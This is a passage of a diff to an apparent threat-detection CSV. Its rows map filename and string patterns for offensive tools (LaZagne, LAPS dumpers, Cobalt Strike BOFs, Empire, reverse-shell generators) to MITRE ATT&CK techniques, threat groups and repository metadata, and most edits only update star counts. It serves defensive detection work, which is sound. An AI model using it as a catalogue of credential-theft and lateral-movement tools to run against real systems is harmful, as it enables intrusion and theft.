-"*LapsAllowedAdminGroups.txt*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2960","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*lanscan_arp.py*","offensive_tool_keyword","red-python-scripts","random networking exploitation scirpts","T1190 - T1046 - T1065","TA0001 - TA0007","N/A","N/A","Collection","https://github.com/davidbombal/red-python-scripts","1","0","N/A","8","10","1842","1638","2023-08-12T21:49:36Z","2021-01-07T16:11:52Z" +"*laps_dump*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 
- TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*LapsAllowedAdminGroups.txt*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" "*LAPSDecrypt.*","offensive_tool_keyword","LAPSDecrypt","Quick POC looking at how encryption works for LAPS (v2)","T1552.004","TA0003","N/A","N/A","Credential Access","https://gist.github.com/xpn/23dc5b6c260a7571763ca8ca745c32f4","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*Lapsdump.cna*","offensive_tool_keyword","C2-Tool-Collection","A collection of tools which integrate with Cobalt Strike (and possibly other C2 frameworks) through BOF and reflective DLL loading techniques","T1055 - T1218 - T1059 - T1027","TA0002 - TA0003 - TA0008","N/A","N/A","C2","https://github.com/outflanknl/C2-Tool-Collection","1","1","N/A","10","10","885","152","2023-05-03T19:35:38Z","2022-04-22T13:43:35Z" "*Lapsdump.exe*","offensive_tool_keyword","C2-Tool-Collection","A collection of tools which integrate with Cobalt Strike (and possibly other C2 frameworks) through BOF and reflective DLL loading techniques","T1055 - T1218 - T1059 - T1027","TA0002 - TA0003 - TA0008","N/A","N/A","C2","https://github.com/outflanknl/C2-Tool-Collection","1","1","N/A","10","10","885","152","2023-05-03T19:35:38Z","2022-04-22T13:43:35Z" "*LAPSDumper-main*","offensive_tool_keyword","LAPSDumper","Dumping LAPS from Python","T1136.001 - T1112 - T1078.001","TA0002 - TA0004 - TA0005","N/A","N/A","Credential Access","https://github.com/n00py/LAPSDumper","1","1","N/A","10","3","222","34","2022-12-07T18:35:28Z","2020-12-19T05:15:10Z" 
-"*LapsPasswords.txt*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2960","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*LapsPasswords.txt*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" "*LAPSToolkit*","offensive_tool_keyword","LAPSToolkit","Functions written in PowerShell that leverage PowerView to audit and attack Active Directory environments that have deployed Microsofts Local Administrator Password Solution (LAPS). It includes finding groups specifically delegated by sysadmins. finding users with All Extended Rights that can view passwords. 
and viewing all computers with LAPS enabled","T1087.001 - T1069 - T1069.003 - T1069.007 - T1069.002 - T1069.001","TA0007 - TA0008 - TA0009","N/A","N/A","Information Gathering","https://github.com/leoloobeek/LAPSToolkit","1","1","N/A","N/A","7","659","108","2018-01-31T14:45:35Z","2016-04-27T00:06:20Z" "*LaresLLC/SlinkyCat*","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://github.com/LaresLLC/SlinkyCat","1","1","N/A","N/A","1","70","3","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z" -"*LasCC/Hack-Tools*","offensive_tool_keyword","hack-tools","The all-in-one Red Team browser extension for Web Pentester","T1059.007 - T1505 - T1068 - T1216 - T1547.009","TA0002 - TA0001 - TA0009","N/A","N/A","Web Attacks","https://github.com/LasCC/Hack-Tools","1","1","N/A","9","10","5006","586","2023-10-03T15:40:37Z","2020-06-22T21:42:16Z" -"*lastpass.x86*","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - 
Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","599","98","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" -"*lastpass/process_lp_files.py*","offensive_tool_keyword","cobaltstrike","Cobaltstrike Bofs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","599","98","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" -"*lastpass_sniffed_fmt_plug*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" -"*lastpass2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" 
+"*LasCC/Hack-Tools*","offensive_tool_keyword","hack-tools","The all-in-one Red Team browser extension for Web Pentester","T1059.007 - T1505 - T1068 - T1216 - T1547.009","TA0002 - TA0001 - TA0009","N/A","N/A","Web Attacks","https://github.com/LasCC/Hack-Tools","1","1","N/A","9","10","5007","586","2023-10-03T15:40:37Z","2020-06-22T21:42:16Z" +"*lastpass.x86*","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","600","99","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" +"*lastpass/process_lp_files.py*","offensive_tool_keyword","cobaltstrike","Cobaltstrike Bofs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - 
T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","600","99","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" +"*lastpass_sniffed_fmt_plug*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*lastpass2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" "*Lateral/DCom.cs*","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","1","N/A","10","10","286","66","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z" "*Lateral/PSExec.cs*","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - 
TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","1","N/A","10","10","286","66","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z" "*Lateral/SMBClient.cs*","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","1","N/A","10","10","286","66","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z" 
@@ -13011,45 +13168,45 @@ "*Launch Empire CLI*","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","0","N/A","N/A","10","3589","533","2023-09-08T05:50:59Z","2019-08-01T04:22:31Z" "*Launch Empire Server*","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - 
T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","0","N/A","N/A","10","3589","533","2023-09-08T05:50:59Z","2019-08-01T04:22:31Z" "*LaunchExploitMode.ps1*","offensive_tool_keyword","MAAD-AF","MAAD Attack Framework - An attack tool for simple fast & effective security testing of M365 & Azure AD. ","T1078.001 - T1552.001 - T1558.001 - T1003.001 - T1110.003 - T1555.003 - T1558.002 - T1087.001 - T1087.002 - T1214.001 - T1562.001 - T1088 - T1559.001 - T1106 - T1204","TA0006 - TA0004 - TA0008 - TA0007 - TA0002 - TA0005","N/A","N/A","Network Exploitation tools","https://github.com/vectra-ai-research/MAAD-AF","1","1","N/A","N/A","3","293","43","2023-09-27T02:49:59Z","2023-02-09T02:08:07Z" -"*LAUNCHING GPODDITY SMB SERVER AND WAITING FOR GPO REQUESTS*","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1076 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/synacktiv/GPOddity","1","0","N/A","9","1","90","6","2023-09-10T10:59:24Z","2023-09-01T08:13:25Z" +"*LAUNCHING GPODDITY SMB SERVER AND WAITING FOR GPO REQUESTS*","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1076 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/synacktiv/GPOddity","1","0","N/A","9","1","91","6","2023-10-04T21:15:32Z","2023-09-01T08:13:25Z" "*LaunchPreCompromise.ps1*","offensive_tool_keyword","MAAD-AF","MAAD Attack Framework 
- An attack tool for simple fast & effective security testing of M365 & Azure AD. ","T1078.001 - T1552.001 - T1558.001 - T1003.001 - T1110.003 - T1555.003 - T1558.002 - T1087.001 - T1087.002 - T1214.001 - T1562.001 - T1088 - T1559.001 - T1106 - T1204","TA0006 - TA0004 - TA0008 - TA0007 - TA0002 - TA0005","N/A","N/A","Network Exploitation tools","https://github.com/vectra-ai-research/MAAD-AF","1","1","N/A","N/A","3","293","43","2023-09-27T02:49:59Z","2023-02-09T02:08:07Z" "*layer8secure/SilentHound*","offensive_tool_keyword","SilentHound","Quietly enumerate an Active Directory Domain via LDAP parsing users + admins + groups...","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://github.com/layer8secure/SilentHound","1","1","N/A","N/A","5","430","44","2023-01-23T20:41:55Z","2022-07-01T13:49:24Z" -"*Lazagne*Passwords.txt*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2960","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" -"*laZagne.exe browsers*","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1552 - T1003 - T1555","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/AlessandroZ/LaZagne","1","0","N/A","10","10","8527","1980","2023-08-12T12:38:22Z","2015-02-16T14:10:02Z" -"*Lazagne.exe*","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. 
Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1552 - T1003 - T1555","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/AlessandroZ/LaZagne","1","1","N/A","10","10","8527","1980","2023-08-12T12:38:22Z","2015-02-16T14:10:02Z" +"*Lazagne*Passwords.txt*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*laZagne.exe browsers*","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1552 - T1003 - T1555","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/AlessandroZ/LaZagne","1","0","N/A","10","10","8530","1980","2023-08-12T12:38:22Z","2015-02-16T14:10:02Z" +"*Lazagne.exe*","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). 
This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1552 - T1003 - T1555","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/AlessandroZ/LaZagne","1","1","N/A","10","10","8530","1980","2023-08-12T12:38:22Z","2015-02-16T14:10:02Z" "*laZagne.exe*","offensive_tool_keyword","viperc2","vipermsf Metasploit - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/FunnyWolf/vipermsf","1","1","N/A","N/A","1","78","37","2023-09-28T08:36:47Z","2021-01-20T13:08:24Z" -"*Lazagne.py*","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1552 - T1003 - T1555","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/AlessandroZ/LaZagne","1","1","N/A","10","10","8527","1980","2023-08-12T12:38:22Z","2015-02-16T14:10:02Z" +"*Lazagne.py*","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). 
This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1552 - T1003 - T1555","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/AlessandroZ/LaZagne","1","1","N/A","10","10","8530","1980","2023-08-12T12:38:22Z","2015-02-16T14:10:02Z" "*LaZagneForensic*","offensive_tool_keyword","LaZagneForensic","Windows passwords decryption from dump files","T1003 - T1081 - T1082","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/AlessandroZ/LaZagneForensic","1","1","N/A","N/A","5","450","114","2023-02-02T16:36:21Z","2018-02-01T15:44:31Z" -"*LaZagne-master.zip*","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1552 - T1003 - T1555","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/AlessandroZ/LaZagne","1","1","N/A","10","10","8527","1980","2023-08-12T12:38:22Z","2015-02-16T14:10:02Z" +"*LaZagne-master.zip*","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1552 - T1003 - T1555","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/AlessandroZ/LaZagne","1","1","N/A","10","10","8530","1980","2023-08-12T12:38:22Z","2015-02-16T14:10:02Z" "*lazynmap.sh*","offensive_tool_keyword","LALIN","this script automatically install any package for pentest with uptodate tools . and lazy command for run the tools like lazynmap . 
install another and update to new","T1588","N/A","N/A","N/A","Exploitation tools","https://github.com/screetsec/LALIN","1","1","N/A","N/A","4","350","164","2017-04-13T13:47:21Z","2016-06-10T07:53:49Z" "*lazypariah *","offensive_tool_keyword","LAZYPARIAH","LAZYPARIAH - A Tool For Generating Reverse Shell Payloads On The Fly","T1059 - T1566 - T1212 - T1574","TA0002 - TA0003 - TA0008","N/A","N/A","POST Exploitation tools","https://github.com/octetsplicer/LAZYPARIAH","1","0","N/A","N/A","2","136","30","2022-06-18T08:59:45Z","2020-11-20T05:08:36Z" "*lazypariah.svg*","offensive_tool_keyword","LAZYPARIAH","LAZYPARIAH - A Tool For Generating Reverse Shell Payloads On The Fly","T1059 - T1566 - T1212 - T1574","TA0002 - TA0003 - TA0008","N/A","N/A","POST Exploitation tools","https://github.com/octetsplicer/LAZYPARIAH","1","1","N/A","N/A","2","136","30","2022-06-18T08:59:45Z","2020-11-20T05:08:36Z" "*ldap_enums.go*","offensive_tool_keyword","adalanche","Active Directory ACL Visualizer and Explorer - who's really Domain Admin?","T1484 - T1069.002","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://github.com/lkarlslund/Adalanche","1","1","N/A","N/A","10","1202","119","2023-06-20T13:02:30Z","2020-10-07T10:07:22Z" "*ldap_shell.py*","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - 
T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/connormcgarr/tgtdelegation","1","1","N/A","10","10","128","21","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z" -"*ldapasn1.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*ldapasn1.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" "*ldapattack.py*","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 